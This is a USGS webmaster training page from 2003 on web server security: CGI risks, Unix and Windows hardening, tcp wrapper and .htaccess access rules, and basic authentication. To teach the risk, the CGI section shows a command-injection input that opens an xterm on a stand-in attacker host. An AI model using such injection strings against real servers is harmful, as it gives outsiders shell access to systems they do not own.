Internal USGS Access Only

Security

General

The Web Server Daemon

The web server daemon, Apache (httpd) on Solaris or Windows and IIS on Windows, determines the access for programs executed by the Web server (CGI and ASP).

CGI

Poorly written CGI programs are the largest security risk associated with a Unix web site. For example, a person filling out a form or passing information in a URL can use special Unix characters to execute a command on the system. Ex:

info for form; xterm -DISPLAY some.evil.org:0

It is a common hacking probe to search for popular CGI programs with known vulnerabilities, such as the "Matt Wright FormMail.pl attack ", listed as one of the top 10 attacks in the first quarter of 2002.

Server Side Includes

Server side includes are a security concern if you can not trust the users on your system (which could be true for an ISP, but not generally for the USGS). For example, a trusted user could run programs that use excessive CPU or disk space.

System Security

Attending to systems security is especially important on web servers because they provide a highly visible target. A few general security guidelines include, in roughly decreasing importance:

The World Wide Web Security FAQ, by W3C provides a number of security references for Web Masters.

System administrators should become familiar with security resources such as CERT, tracking and fixing relevant security problems as they are discovered.

Solaris/Unix

• Follow Unix Security guidelines
• Disable lower-security protocols such "rlogin", exec "rsh/remsh" and Yellow Pages (NIS)
• Presumably you are using Active Directory for all non-administrator passwords.
• Install and use secure shell, ssh (Solaris, Windows or Macintosh), to connect to the web-server; Disable telnet and ftp connections. This becomes most important if site maintainers will be connecting to the server from outside the USGS, where password information would have to travel unprotected over the Internet.
• Make sure your web server is not a "trusted host " on your network; don't allow telnet, ftp, or rsh/remsh from your web-server to other computers on your network. Below is a sample of part of a tcp-ip wrapper settings file, /etc/hosts.allow for the other Unix systems on your LAN:

  rshd:     127.0.0.1 .usgs.gov  EXCEPT h2o.er.usgs.gov
  ftpd:     .usgs.gov  EXCEPT water.usgs.gov : umask 022
  telnetd:  .usgs.gov  EXCEPT water.usgs.gov
  rlogind:  .usgs.gov  EXCEPT water.usgs.gov
  rexecd:   .usgs.gov  EXCEPT water.usgs.gov

• NFS and Samba are somewhat controversial, they trade a small security risk for a high level of convenience.
• Out of the box the httpd daemon runs as user nobody, in group nobody. As packaged by DIS for Solaris, the httpd daemon runs as user webd (user number 31907) in group webd (group number 31907).

  Nothing should be writable by user or group webd, unless a CGI program needs to write to that file.

Windows

It is extremely important to keep up-to-date with the frequent security updates from Microsoft. Numerous USGS systems were involved in the CodeRed virus outbreak, and were a contributing factor to the subsequent blockage of access to USGS Web servers.

• Follow Windows Security guidelines
• Keep Web Server patches up-to-date:
  NT TAC security measures for IIS, and
  NT TAC security measures for apache.

Security Administrator, guidelines for security by Windows and .NET magazines.

The relative sizes of the security notes for Solaris vs Windows should not be taken to imply that less needs to be done for Windows to obtain a secure system. The size of these lists merely reflects the amount of familiarity of the course authors with each of these systems. Solaris/apache systems have had fewer security problems than Windows/IIS systems, as reflected in the number of CERT warnings.

Access Control

Host based access control

Server dependent -- Apache uses a configuration file access.conf (or as configured on Solaris, httpd.conf) to control access to web pages for a site. Restrictions are based on hostnames or internet numbers. Setting the access to *.usgs.gov will restrict to USGS-only access ^* .

Access should be set for the following directories:

• DocumentRoot, the top directory containing your web documents; On Solaris, the default is /www/htdocs/.
• the directory that contains user's home directories, so that files in ~username/public_html/ are protected
• the cgi-bin/ directory to protect cgi scripts

A file .htaccess in any directory can be used to modify the default access for that part of the directory tree. Example.htaccess contents:


#lock out non-usgs access attempts
order deny,allow
deny from all
allow from .usgs.gov

User Authentication (passwords)

This is only a modest level of security. It's like locking your screen door, but is okay for non-sensitive information.

It is possible to set a password for access the contents of a directory. Examples and references for this kind of access control

• Example implementation of user authentication http://hoohoo.ncsa.uiuc.edu/docs/tutorials/user.html,
• The technical reference from the Apache folks themselves http://httpd.apache.org/docs/howto/auth.html#basicconfig,
• and a good reference from Apache Week http://www.apacheweek.com/features/userauth

Subscribe to a Anonymous Browsing Service

WebVeil lists a number of sites providing subscription anonymous proxies. See what your pages look like from outside the USGS. Use one to verify security restrictions, or have CGI domain-based logic you wish to check. Another such site is Anonymizer.com

slide 56

Lab Exercise on Server-Side-Includes and Security

"Mastering a Web Site" online course Created and maintained by Lorna Schmid and David Boldt. http://water.usgs.gov/usgs/training/webmaster/security.html     Last modified: Tue Nov 04 15:07:39 Eastern Standard Time 2003